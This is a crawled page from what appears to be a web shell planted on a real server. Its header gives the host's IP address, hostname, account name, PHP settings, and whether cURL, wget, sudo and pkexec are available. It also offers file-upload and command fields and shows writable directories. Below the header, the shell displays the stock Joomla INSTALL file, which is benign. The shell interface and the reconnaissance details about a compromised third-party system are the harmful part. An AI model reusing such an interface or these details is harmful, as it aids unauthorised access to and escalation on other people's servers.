Private
Server IP : 195.201.23.43  /  Your IP : 3.137.184.170
Web Server : Apache
System : Linux webserver2.vercom.be 5.4.0-192-generic #212-Ubuntu SMP Fri Jul 5 09:47:39 UTC 2024 x86_64
User : kdecoratie ( 1041)
PHP Version : 7.1.33-63+ubuntu20.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/kdecoratie/public_html/installation2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/kdecoratie/public_html/installation2/INSTALL
<?php
/**
 * @package    Joomla.Installation
 *
 * @copyright  Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

REQUIREMENTS
------------

First you must have the base environment for Joomla.
We have thoroughly tested Joomla! on: Linux, Free BSD, Mac OS X and Windows.
Linux or one of the BSD's are recommended, but anything else that can run 
a supported PHP version, a supported database and a supported web server listed
in the Technical Requirements at https://www.joomla.org/about-joomla/technical-requirements.html
should do it.


SERVER CONFIGURATION
--------------------

You MUST ensure that PHP has been compiled with support for MySQL (or the database
you are using) and Zlib in order to successfully run Joomla.

While we have reports that Joomla! works on IIS server we recommend Apache
for running Joomla! on Windows.


OPTIONAL COMPONENTS
-------------------

If you want support for SEF (Search Engine Friendly) URLs using the Apache web server
you'll need mod_rewrite and the ability to use local .htaccess files. If you are using
the IIS web server you'll need the ability to use local web.config.txt files


INSTALLATION
------------

1. DOWNLOAD Joomla

	You can obtain the latest Joomla! release from:
		https://www.joomla.org/download.html

	Copy the tar.gz file into a working directory eg

	$ cp JoomlaVx.x.x-Stable.tar.gz /tmp/Joomla

	Change to the working directory eg

	$ cd /tmp/Joomla

	Extract the files eg

	$ tar -zxvf JoomlaVx.x.x-Stable.tar.gz

	This will extract all the Joomla! files and directories.  Move the contents
	of that directory into a directory within your web server's document
	root or your public HTML directory eg

	$ mv /tmp/Joomla/* /var/www/html

	Alternatively if you downloaded the file to your computer and unpacked
	it locally use an FTP program to upload all files to your server.
	Make sure all PHP, HTML, CSS and JS files are sent in ASCII mode and
	image files (GIF, JPG, PNG) in BINARY mode.


2. CREATE THE Joomla! DATABASE

	Joomla! will currently work with MySQL, MSSQL and PostgreSQL but
	the following instructions are for MySQL. Refer to the relevant
	documentation if you are using another database.

	You can use your web control panel or phpMyAdmin to
	create a database for Joomla.

	Alternatively you can create a database with the CLI.
	In the following examples, "db_user" is an example MySQL user
	which has the CREATE and GRANT privileges. You will need to use
	the appropriate username for your system.

	First, you must create a new database for your Joomla! site eg

	$ mysqladmin -u db_user -p create Joomla

	MySQL will prompt for the 'db_user' database password and then create
	the initial database files. Next you must login and set the access
	database rights eg

	$ mysql -u db_user -p

	Again, you will be asked for the 'db_user' database password.  At the
	MySQL prompt, enter following command:

	GRANT ALL PRIVILEGES ON Joomla.*
		TO nobody@localhost IDENTIFIED BY 'password';

	where:

	'Joomla' is the name of your database
	'nobody@localhost' is the userid of your web server MySQL account
	'password' is the password required to log in as the MySQL user

	If successful, MySQL will reply with

	Query OK, 0 rows affected

	to activate the new permissions you must enter the command

	flush privileges;

	and then enter 'exit' or 'quit' to exit MySQL.

3. WEB INSTALLER

Finally point your web browser to http://www.example.org where the Joomla! web
based installer will guide you through the rest of the installation.

4. CONFIGURE Joomla

You can now launch your browser and point it to your Joomla! site eg

	http://www.example.org -> Main Site
	http://www.example.org/administrator -> Admin

You can log into Admin using the username and password that you chose 
during the web based install.


Joomla! ADMINISTRATION
----------------------

Upon a new installation, your Joomla website defaults to a very basic
configuration with only a few active components, modules and templates.

Use Admin to install and configure additional extensions, add users, select
default language and much more.

Note that additional community contributed extensions and languages are
available at the Joomla! Extensions Directory (JED): https://extensions.joomla.org/

You can also install and use the `Install from Web Tab` to access the JED
directly from the Admin here:
http://www.example.org/administrator/index.php?option=com_installer&view=install
Private